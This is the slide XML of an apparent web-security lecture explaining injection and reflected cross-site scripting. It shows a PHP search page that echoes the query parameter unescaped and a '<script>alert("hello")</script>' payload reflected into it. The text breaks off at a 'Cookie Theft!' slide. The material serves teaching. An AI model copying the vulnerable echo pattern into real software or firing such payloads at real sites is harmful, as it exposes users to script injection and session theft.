              <a:t>Attack occurs when application takes untrusted data and sends it to a web browser without proper validation or sanitization.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="321" name="Command/SQL Injection…"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3250308" y="6899228"/>
            <a:ext cx="8090295" cy="4079736"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumOff val="-13575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>
              <a:defRPr b="0" sz="6000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF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pPr>
            <a:r>
              <a:t>Command/SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="3500"/>
              </a:spcBef>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Neue Medium"/>
              </a:rPr>
              <a:t>attacker’s malicious code is </a:t>
            </a:r>
            <a:br>
              <a:rPr b="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Neue Medium"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Neue Medium"/>
              </a:rPr>
              <a:t>executed on app’s </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" u="sng">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Neue Medium"/>
              </a:rPr>
              <a:t>server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="322" name="Cross Site Scripting…"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13043397" y="6899228"/>
            <a:ext cx="8090295" cy="4079736"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:hueOff val="362282"/>
              <a:satOff val="31803"/>
              <a:lumOff val="-18242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>
              <a:defRPr b="0" sz="6000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF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pPr>
            <a:r>
              <a:t>Cross Site Scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="3500"/>
              </a:spcBef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t>attacker’s malicious code is </a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>executed on victim’s </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng"/>
              <a:t>browser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Search Exampl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>
              <a:defRPr sz="1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/>
            <a:r>
              <a:t>Search Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="327" name="&lt;html&gt;…"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4008670" y="5210991"/>
            <a:ext cx="16366660" cy="3942393"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="5E5E5E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 algn="l" defTabSz="457200">
              <a:defRPr sz="3700">
                <a:solidFill>
                  <a:srgbClr val="008F00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rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:defRPr b="0" sz="3700">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="008F00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>title</a:t>
            </a:r>
            <a:r>
              <a:t>&gt;Search Results&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="008F00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>title</a:t>
            </a:r>
            <a:r>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:defRPr sz="3700">
                <a:solidFill>
                  <a:srgbClr val="008F00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rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  &lt;</a:t>
            </a:r>
            <a:r>
              <a:t>body</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:defRPr b="0" sz="3700">
                <a:solidFill>
                  <a:srgbClr val="C98C00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rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="008F00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>h1</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;Results for </a:t>
            </a:r>
            <a:r>
              <a:t>&lt;?php echo $_GET["q"] ?&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="008F00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>h1</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:defRPr b="0" sz="3700">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>  &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="008F00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>body</a:t>
            </a:r>
            <a:r>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:defRPr sz="3700">
                <a:solidFill>
                  <a:srgbClr val="008F00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rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="328" name="https://google.com/search?q=&lt;search term&gt;"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10859053" y="4617679"/>
            <a:ext cx="9488427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latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>https://google.com/search?q=&lt;search term&gt;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Normal Reques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>
              <a:defRPr sz="1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/>
            <a:r>
              <a:t>Normal Request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="333" name="&lt;html&gt;…"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4008670" y="3856482"/>
            <a:ext cx="16366660" cy="3855580"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="5E5E5E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 algn="l" defTabSz="457200">
              <a:defRPr sz="3700">
                <a:solidFill>
                  <a:srgbClr val="008F00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rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:defRPr b="0" sz="3700">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="008F00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>title</a:t>
            </a:r>
            <a:r>
              <a:t>&gt;Search Results&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="008F00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>title</a:t>
            </a:r>
            <a:r>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:defRPr sz="3700">
                <a:solidFill>
                  <a:srgbClr val="008F00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rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  &lt;</a:t>
            </a:r>
            <a:r>
              <a:t>body</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:defRPr b="0" sz="3700">
                <a:solidFill>
                  <a:srgbClr val="C98C00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rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="008F00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>h1</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;Results for </a:t>
            </a:r>
            <a:r>
              <a:t>&lt;?php echo $_GET["q"] ?&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="008F00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>h1</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:defRPr b="0" sz="3700">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>  &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="008F00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>body</a:t>
            </a:r>
            <a:r>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:defRPr sz="3700">
                <a:solidFill>
                  <a:srgbClr val="008F00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rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="334" name="https://google.com/search?q=apple"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12717315" y="3197740"/>
            <a:ext cx="7659329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>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>https://google.com/search?q=</a:t>
            </a:r>
            <a:r>
              <a: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rPr>
              <a:t>apple</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="335" name="&lt;html&gt;…"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4008670" y="8799300"/>
            <a:ext cx="16366660" cy="3855580"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="63500">
            <a:solidFill>
              <a:schemeClr val="accent5">
                <a:lumOff val="-29866"/>
              </a:schemeClr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 algn="l">
              <a:defRPr b="0" sz="3700">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="0" sz="3700">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>title</a:t>
            </a:r>
            <a:r>
              <a:t>&gt;Search Results&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>title</a:t>
            </a:r>
            <a:r>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="0" sz="3700">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>body</a:t>
            </a:r>
            <a:r>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="0" sz="3700">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>    &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>h1</a:t>
            </a:r>
            <a:r>
              <a:t>&gt;Results for </a:t>
            </a:r>
            <a:r>
              <a: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rPr>
              <a:t>apple</a:t>
            </a:r>
            <a:r>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>h1</a:t>
            </a:r>
            <a:r>
              <a:t>&gt;</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>  &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>body</a:t>
            </a:r>
            <a:r>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="0" sz="3700">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="336" name="Sent to Browser"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4033690" y="8149293"/>
            <a:ext cx="3043048" cy="5604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Sent to Browser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Embedded Scrip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>
              <a:defRPr sz="1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/>
            <a:r>
              <a:t>Embedded Script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="341" name="&lt;html&gt;…"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3614320" y="3902023"/>
            <a:ext cx="17155360" cy="3855580"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="5E5E5E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 algn="l" defTabSz="457200">
              <a:defRPr sz="3700">
                <a:solidFill>
                  <a:srgbClr val="008F00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rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:defRPr b="0" sz="3700">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="008F00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>title</a:t>
            </a:r>
            <a:r>
              <a:t>&gt;Search Results&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="008F00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>title</a:t>
            </a:r>
            <a:r>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:defRPr sz="3700">
                <a:solidFill>
                  <a:srgbClr val="008F00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rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  &lt;</a:t>
            </a:r>
            <a:r>
              <a:t>body</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:defRPr b="0" sz="3700">
                <a:solidFill>
                  <a:srgbClr val="C98C00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rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="008F00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>h1</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;Results for </a:t>
            </a:r>
            <a:r>
              <a:t>&lt;?php echo $_GET["q"] ?&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="008F00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>h1</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:defRPr b="0" sz="3700">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>  &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="008F00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>body</a:t>
            </a:r>
            <a:r>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:defRPr sz="3700">
                <a:solidFill>
                  <a:srgbClr val="008F00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rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="342" name="https://google.com/search?q=&lt;script&gt;alert(“hello”)&lt;/script&gt;"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8463071" y="3271562"/>
            <a:ext cx="12254937" cy="508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700">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>https://google.com/search?q=</a:t>
            </a:r>
            <a:r>
              <a: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rPr>
              <a:t>&lt;script&gt;alert(“hello”)&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="343" name="&lt;html&gt;…"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3614320" y="8844841"/>
            <a:ext cx="17155360" cy="3855580"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="5E5E5E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 algn="l">
              <a:defRPr b="0" sz="3700">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="0" sz="3700">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>title</a:t>
            </a:r>
            <a:r>
              <a:t>&gt;Search Results&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>title</a:t>
            </a:r>
            <a:r>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="0" sz="3700">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>body</a:t>
            </a:r>
            <a:r>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="0" sz="3700">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>    &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>h1</a:t>
            </a:r>
            <a:r>
              <a:t>&gt;Results for </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a: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rPr>
              <a:t>alert(“hello")</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>h1</a:t>
            </a:r>
            <a:r>
              <a:t>&gt;</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>  &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>body</a:t>
            </a:r>
            <a:r>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="0" sz="3700">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="344" name="Sent to Browser"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3639340" y="8194835"/>
            <a:ext cx="3043048" cy="5604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Sent to Browser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Cookie Theft!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>
              <a:defRPr sz="1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/>
            <a:r>
              <a:t>Cookie Theft!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="349" name="&lt;html&gt;…"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
